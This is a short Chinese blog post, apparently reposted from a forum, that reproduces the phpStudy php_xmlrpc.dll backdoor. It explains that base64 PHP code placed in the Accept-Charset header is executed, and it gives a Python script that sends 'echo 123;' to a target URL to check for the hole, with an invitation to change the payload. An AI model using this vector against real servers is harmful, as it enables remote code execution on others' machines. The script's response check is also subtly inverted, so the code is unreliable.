PHPstudy漏洞复现及脚本

0x01:最近又出了一个大动静,我们常用的phpstudy竟然存在后门?
103351dkffz5fxsldrzs2e.png.thumb.jpg.png
0x02:晚上团队表哥们突然炸了锅似的。。都在研究。。于是自己也跟着表哥们思路复现了一下
利用条件(后门存在)
phpphp-5.4.45extphp_xmlrpc.dll”文件和“phpphp-5.2.17extphp_xmlrpc.dll”文件中

如下图 发现可疑处 evel函数这 可利用该方法检测一下
103723l5ggg6yrgg6y537y.png.thumb.jpg.png

通过http头 Accept-Charset 传入参数RCE(base64)即可
如图(中招了。。):
103917lt400t040wffy70y.png.thumb.jpg.png
0x03: 用python写了很简单的小脚本
import requests
headers = {
'Accept-Language': 'zh-CN,zh;q=0.8',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Accept-Charset': 'ZWNobyAxMjM7',
'Accept-Encoding': 'gzip,deflate'
}
url = input('请输入URL:')
res = requests.get(url=url,headers=headers)
if res.text in "123":

print('存在漏洞')

else:

print('没有漏洞')

base64加密的为 echo 123;
后续大佬们可以自己改一下。。
注: Accept-Charset: 参数 参数前面要有空格。。
104436yx8azkstoc58oj5a.png.thumb.jpg.png

转载“https://bbs.ichunqiu.com/thread-53941-1-1.html

你可能还喜欢...

添加新评论